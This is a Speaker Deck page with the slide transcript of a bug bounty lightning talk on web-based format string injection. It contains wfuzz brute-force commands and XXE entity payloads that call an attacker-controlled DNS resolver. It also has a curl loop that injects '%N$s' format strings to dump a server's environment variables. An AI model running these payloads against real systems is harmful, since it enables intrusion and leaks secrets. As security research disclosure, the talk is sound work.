Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web based format injection, dumping memory like...
Search
Frans Rosén
September 19, 2018
Research
0
120
Web based format injection, dumping memory like it's 99 (or "Please help")
My lightning talk from Sec-T Stockholm in September 2018.
Frans Rosén
September 19, 2018
Tweet
Share
More Decks by Frans Rosén
See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
1.4k
Story of a RCE on Apple through hot jar swapping
fransrosen
0
1.2k
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
260
A methodology using fuzzing and info disclosure
fransrosen
0
330
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
9.2k
A story of the passive aggressive sysadmin of AEM
fransrosen
0
8.3k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
7.2k
Other Decks in Research
See All in Research
電通総研の生成AI・エージェントの取り組み エンジニアリング業務向けAI活用事例紹介
isidaitc
1
210
電力システム最適化入門
mickey_kubo
1
630
Streamlit 総合解説 ~ PythonistaのためのWebアプリ開発 ~
mickey_kubo
1
890
大規模な2値整数計画問題に対する 効率的な重み付き局所探索法
mickey_kubo
1
230
SSII2025 [TS1] 光学・物理原理に基づく深層画像生成
ssii
PRO
3
3.3k
Mathematics in the Age of AI and the 4 Generation University
hachama
0
160
Sosiaalisen median katsaus 03/2025 + tekoäly
hponka
0
1.3k
ノンパラメトリック分布表現を用いた位置尤度場周辺化によるRTK-GNSSの整数アンビギュイティ推定
aoki_nosse
0
320
NLP2025参加報告会 LT資料
hargon24
1
320
Computational OT #1 - Monge and Kantorovitch
gpeyre
0
170
時系列データに対する解釈可能な 決定木クラスタリング
mickey_kubo
2
680
Transparency to sustain open science infrastructure - Printemps Couperin
mlarrieu
1
170
Featured
See All Featured
Bootstrapping a Software Product
garrettdimon
PRO
307
110k
Speed Design
sergeychernyshev
31
1k
Build The Right Thing And Hit Your Dates
maggiecrowley
36
2.8k
Making Projects Easy
brettharned
116
6.3k
Learning to Love Humans: Emotional Interface Design
aarron
273
40k
A designer walks into a library…
pauljervisheath
206
24k
[RailsConf 2023] Rails as a piece of cake
palkan
55
5.6k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
507
140k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
53
2.8k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
32
5.9k
Thoughts on Productivity
jonyablonski
69
4.7k
Why You Should Never Use an ORM
jnunemaker
PRO
56
9.4k
Transcript
@fransrosen Web based format injection, dumping memory like it's 99
or "Please help"
@fransrosen Public Bug Bounty
@fransrosen RCE is 30,000 USD
@fransrosen Methodology • Found a domain not like the other
ones
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting
path: /cgi-bin/default/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen xml_api?
@fransrosen xml_api?
@fransrosen xml_api? YEAH! 👍
@fransrosen wtf!?
@fransrosen XXE!
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???
@fransrosen
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.
@fransrosen Format String Injection?
@fransrosen Format String Injection ON ZE WEB?
@fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen I can’t handle this shit
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Limitations 0x20-0xFF (no 0x22)
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Want to collaborate? @fransrosen
@fransrosen Questions? Suggestions?
fransrosen
isidaitc
mickey_kubo
ssii
hachama
hponka
aoki_nosse
hargon24
gpeyre
mlarrieu
garrettdimon
sergeychernyshev
maggiecrowley
brettharned
aarron
pauljervisheath
palkan
chriscoyier
tammyeverts
kevinliebholz
jonyablonski
jnunemaker
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_27.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_28.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_33.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_34.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_35.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_36.jpg){kind=link}
![@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>](https://files.speakerdeck.com/presentations/0503d982eb5c417998df22b7cb4fa2b4/slide_37.jpg){kind=link}
